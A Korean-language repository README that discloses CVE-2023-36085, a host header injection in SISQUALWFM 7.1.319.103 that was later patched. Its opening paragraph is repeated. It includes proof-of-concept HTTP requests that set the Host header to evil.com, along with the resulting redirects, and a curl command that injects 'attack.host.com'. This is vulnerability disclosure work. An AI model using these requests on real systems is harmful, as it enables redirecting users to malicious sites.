
이 저장소는 SISQUALWFM 버전 7.1.319.103에서 발견된 호스트 헤더 주입 취약점인 CVE-2023-36085와 관련된 정보를 포함합니다. 이 취약점은 공격자가 웹페이지 링크를 조작하거나 사용자를 악성 사이트로 리디렉션할 수 있게 합니다. 이 취약점은 CVE-2023-36085로 지정되었으며 버전 7.1.319.111 이상에서 수정되었습니다.
이 저장소에는 SISQUALWFM 버전 7.1.319.103에서 발견된 호스트 헤더 주입 취약점과 관련된 정보가 포함되어 있으며, 이 취약점으로 인해 공격자가 웹페이지 링크를 조작하거나 사용자를 악성 사이트로 리디렉션할 수 있습니다. 이 취약점에는 CVE-2023-36085가 할당되었으며 버전 7.1.319.111 이상에서 수정되었습니다.
호스트 헤더 주입 취약점을 입증하는 개념 증명 시나리오를 제공하며, 특히 /sisqualIdentityServer/core 엔드포인트를 대상으로 합니다. 이 취약점을 통해 공격자는 호스트 헤더를 변조하여 웹페이지 링크를 조작하거나 사용자를 다른 사이트로 리디렉션할 수 있습니다.
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

이 취약점을 악용하기 위해 공격자는 다음 curl 명령을 사용하여 호스트 헤더를 수정할 수 있습니다:
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
이 저장소는 정보 제공 목적으로만 제공되며 악의적인 활동에 사용되어서는 안 됩니다. 이 취약점은 공급업체에 책임감 있게 공개되었으며 문제는 해결되었습니다. 취약점을 식별하고 보고할 때 윤리적 해킹 지침을 따르고 책임 있는 공개 관행을 존중하는 것이 중요합니다.